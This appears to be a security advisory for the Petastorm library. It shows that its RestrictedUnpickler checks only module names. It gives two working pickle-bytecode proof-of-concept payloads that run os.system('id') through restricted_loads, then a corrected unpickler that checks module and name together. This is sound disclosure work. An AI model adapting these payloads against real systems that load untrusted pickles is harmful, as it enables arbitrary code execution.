Petastorm library enables single machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as Tensorflow, Pytorch, and PySpark and can be used from pure Python code.
RestrictedUnpickler only checks whether the module is in its allowlist and doesn't check the name value at all, so we can still import some dangerous functions.
Now, I'll try to generate the pickle bytecode using my toy compiler. Exploits should execute code equivalent to __import__('os').system('id').
Let's take __builtin__ (named builtins in Python 3) as an example:
[Exploit 0x01] We can combine builtins.__import__ and builtins.getattr to import arbitrary dangerous functions.
from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N.')
Bytecode is generated by: python pickora.py -c '__import__("os").system("id")'.
[Exploit 0x02] We can just use builtins.eval or builtins.exec to execute arbitrary Python code.
from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x956\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x04eval\x93\x8c\x1d__import__("os").system("id")\x85R1N.')
Bytecode is generated by: python pickora.py -c "eval('__import__(\"os\").system(\"id\")')".
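To see why a module-only check is not enough, here is a minimal sketch that does not use petastorm at all. ModuleOnlyUnpickler, ALLOWED_MODULES and module_only_loads are hypothetical names I made up to mimic the flaw, and the allowlist is an assumption rather than petastorm's real one. The payload is a hand-written protocol 0 pickle that only evaluates the harmless expression 1+1.

```python
import io
import pickle

# Hypothetical allowlist for illustration only; not petastorm's actual list.
ALLOWED_MODULES = {"builtins", "collections"}


class ModuleOnlyUnpickler(pickle.Unpickler):
    """Illustrative stand-in: checks the module but ignores the name."""

    def find_class(self, module, name):
        if module in ALLOWED_MODULES:
            # Any attribute of an allowed module gets through, including eval.
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def module_only_loads(data):
    """Unpickle bytes with the module-only check above."""
    return ModuleOnlyUnpickler(io.BytesIO(data)).load()


# Opcodes: GLOBAL builtins.eval, MARK, UNICODE "1+1", TUPLE, REDUCE, STOP.
HARMLESS_PAYLOAD = b"cbuiltins\neval\n(V1+1\ntR."

result = module_only_loads(HARMLESS_PAYLOAD)
print(result)  # 2, i.e. eval("1+1") ran during unpickling
```

A payload that names os.system directly is rejected by this check, because os is not in the allowlist, but that does not help once builtins.eval or builtins.getattr is reachable.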
The Proper Way?
The correct way to restrict globals is to check both module and name in find_class at the same time, just like the documentation does.
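A minimal sketch of that idea, following the pattern from the "Restricting Globals" section of the Python pickle documentation. StrictUnpickler, SAFE_GLOBALS and strict_loads are hypothetical names, and the allowlist entries are an assumption; a real fix would list exactly the (module, name) pairs the legacy data needs.

```python
import io
import pickle

# Assumed allowlist of exact (module, name) pairs; adjust to the data at hand.
SAFE_GLOBALS = {
    ("builtins", "range"),
    ("builtins", "complex"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "slice"),
}


class StrictUnpickler(pickle.Unpickler):
    """Only resolves globals whose module AND name are both allowlisted."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def strict_loads(data):
    """Unpickle bytes, rejecting every global outside SAFE_GLOBALS."""
    return StrictUnpickler(io.BytesIO(data)).load()


# Allowed: plain containers plus builtins.range.
print(strict_loads(pickle.dumps([1, 2, range(15)])))

# Rejected: builtins is a known module, but eval is not an allowed name.
try:
    strict_loads(b"cbuiltins\neval\n(V1+1\ntR.")
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Checking the pair as a unit means that allowing one name from builtins says nothing about eval, exec, getattr or __import__.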
TL;DR
The implementation of RestrictedUnpickler here is bypassable: https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L34-L48
How to Bypass (PoC)
Basically, it only allows the following modules to be imported: https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L22-L31